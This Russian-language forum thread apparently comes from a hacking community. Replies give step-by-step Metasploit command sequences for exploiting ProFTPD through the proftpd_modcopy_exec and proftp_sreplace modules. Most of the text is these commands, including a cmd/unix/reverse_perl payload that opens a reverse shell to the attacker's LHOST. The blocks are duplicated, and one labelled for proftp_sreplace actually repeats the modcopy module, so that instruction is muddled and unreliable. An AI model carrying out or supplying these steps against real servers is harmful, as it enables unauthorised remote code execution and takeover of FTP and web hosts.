msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(proftpd_modcopy_exec) > show targets
msf exploit(proftpd_modcopy_exec) > set TARGET id_цели
msf exploit(proftpd_modcopy_exec) > show options - проверяем опции,сверяем
msf exploit(proftpd_modcopy_exec) > exploit
msf> use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST IP_цели
set SITEPATH /var/www/html/имя_тестовой_директории
set TARGETURI /имя_тестовой_директории/
set PAYLOAD cmd/unix/reverse_perl
set LHOST IP_атакующей машины
> run
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost IP_цели
msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
msf exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_modcopy_exec) > run
msf > use exploit/linux/ftp/proftp_sreplace
msf exploit(proftp_sreplace) > show targets
msf exploit(proftp_sreplace) > set TARGET id_цели
msf exploit(proftp_sreplace) > show options
msf exploit(proftp_sreplace) > exploit
СпасибоДобрый день.
Вы указываете не payload , а другой эксплойт.
К тому же ещё дублируете :>set payload exploit
После выбора рекомендуется просматривать опции командой show options.
Так Вы будете ориентированы в том,что от Вас требуется для атаки или теста.
И ,смотря какую CVE пытаетесь эксплуатировать.
Если работать с proftpd_modcopy_exec,то алгоритм может быть таким :
Эксплуатация с задействованием демона proftpd на сервере FTP может быть такой:Код:msf > use exploit/unix/ftp/proftpd_modcopy_exec msf exploit(proftpd_modcopy_exec) > show targets msf exploit(proftpd_modcopy_exec) > set TARGET id_цели msf exploit(proftpd_modcopy_exec) > show options - проверяем опции,сверяем msf exploit(proftpd_modcopy_exec) > exploit
Либо можете провести стандартную атаку:Код:msf> use exploit/unix/ftp/proftpd_modcopy_exec set RHOST IP_цели set SITEPATH /var/www/html/имя_тестовой_директории set TARGETURI /имя_тестовой_директории/ set PAYLOAD cmd/unix/reverse_perl set LHOST IP_атакующей машины > run
И с модулем proftp_sreplace ведётся аналогичная работа с таким алгоритмом:Код:msf > use exploit/unix/ftp/proftpd_modcopy_exec msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost IP_цели msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html msf exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl msf exploit(unix/ftp/proftpd_modcopy_exec) > run
Из опций только не забываем указать необходимые параметры.Код:msf > use exploit/linux/ftp/proftp_sreplace msf exploit(proftp_sreplace) > show targets msf exploit(proftp_sreplace) > set TARGET id_цели msf exploit(proftp_sreplace) > show options msf exploit(proftp_sreplace) > exploit
Ух ты я не знал, спасибо за информациюдля выбранного эксплоита можно посмотреть перечень доступных нагрузок командой:
msf> show payloads
Посмотреть вложение 22591
После чего:
msf> set payload (тут выбранная из доступных нагрузок)
и продолжить настройку.
Ух ты я не знал, спасибо за информацию
Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab